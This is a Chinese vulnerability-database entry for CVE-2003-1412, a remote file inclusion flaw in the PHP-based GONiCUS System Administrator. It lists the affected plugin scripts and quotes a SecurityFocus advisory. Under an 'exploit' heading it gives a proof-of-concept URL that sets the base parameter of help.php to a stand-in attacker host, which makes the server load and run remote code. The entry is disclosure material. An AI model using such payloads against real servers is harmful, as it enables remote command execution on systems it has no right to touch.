GONiCUS System Administrator远程文件包含漏洞-安全小百科

GONiCUS System Administrator远程文件包含漏洞

漏洞ID	1107220	漏洞类型	代码注入
发布时间	2003-02-24	更新时间	2003-12-31
CVE编号	CVE-2003-1412	CNNVD-ID	CNNVD-200312-280
漏洞平台	PHP	CVSS评分	6.8

|漏洞来源

https://www.exploit-db.com/exploits/22279
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-280

|漏洞详情

GOnicusSystemAdministrator是一款基于PHP的管理LDAP数据库中的帐户/系统的工具。部分PHP脚本对用户提供的输入缺少充分过滤，远程攻击者可以利用这个漏洞包含远程服务器上的文件，以WEB进程权限执行恶意文件中的任意命令。下面的PHP脚本由于对包含文件的请求缺少正确检查，可以设置plugin变量来执行远程服务器上的任意文件：plugins/3fax/1blocklists/index.phpplugins/2administration/6departamentadmin/index.phpplugins/2administration/5terminals/index.phpplugins/2administration/4mailinglists/index.phpplugins/2administration/3departaments/index.phpplugins/2administration/2groupd/index.phpinclude/help.php文件也存在同样问题，可以提交恶意URI导致从攻击者服务器上装载包含恶意代码的include/common.inc文件，使文件中包含的恶意命令以WEB权限执行。如：http://target.server/include/help.php?base=http://attackers.server/

|漏洞EXP

source: http://www.securityfocus.com/bid/6922/info

GONiCUS System Administrator is prone to an issue that may allow remote attackers to include files located on remote servers. This issue is present in several PHP pages existing in the /plugins and /includes folders.

By crafting specific URI parameters it is possible for an attacker to influence the include path for these scripts to an external file on an attacker-controlled host. If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the vulnerable web server.

This vulnerability has been reported for GONiCUS System Administrator Version 1, previous versions may also be affected.

http://www.example.org/include/help.php?base=http://www.attacker.org/

|参考资料

来源:XF
名称:gosa-plugin-file-include(11408)
链接:http://xforce.iss.net/xforce/xfdb/11408
来源:BID
名称:6922
链接:http://www.securityfocus.com/bid/6922
来源:FULLDISC
名称:20030223GOnicusSystemAdministratorphpinjection
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2003-February/003932.html
来源:SECTRACK
名称:1006162
链接:http://www.securitytracker.com/id?1006162
来源:BUGTRAQ
名称:20030224GOnicusSystemAdministratorphpinjection
链接:http://www.securityfocus.com/archive/1/archive/1/313282/30/25760/threaded
来源:SECUNIA
名称:8120
链接:http://secunia.com/advisories/8120
来源：NSFOCUS
名称：4452
链接：http://www.nsfocus.net/vulndb/4452

相关推荐: Compaq Tru64 Kernel Race Condition Vulnerability

Compaq Tru64 Kernel Race Condition Vulnerability 漏洞ID 1102521 漏洞类型 Race Condition Error 发布时间 2002-01-30 更新时间 2002-01-30 CVE编号 N/A …

文章版权归作者所有，未经允许请勿转载。

THE END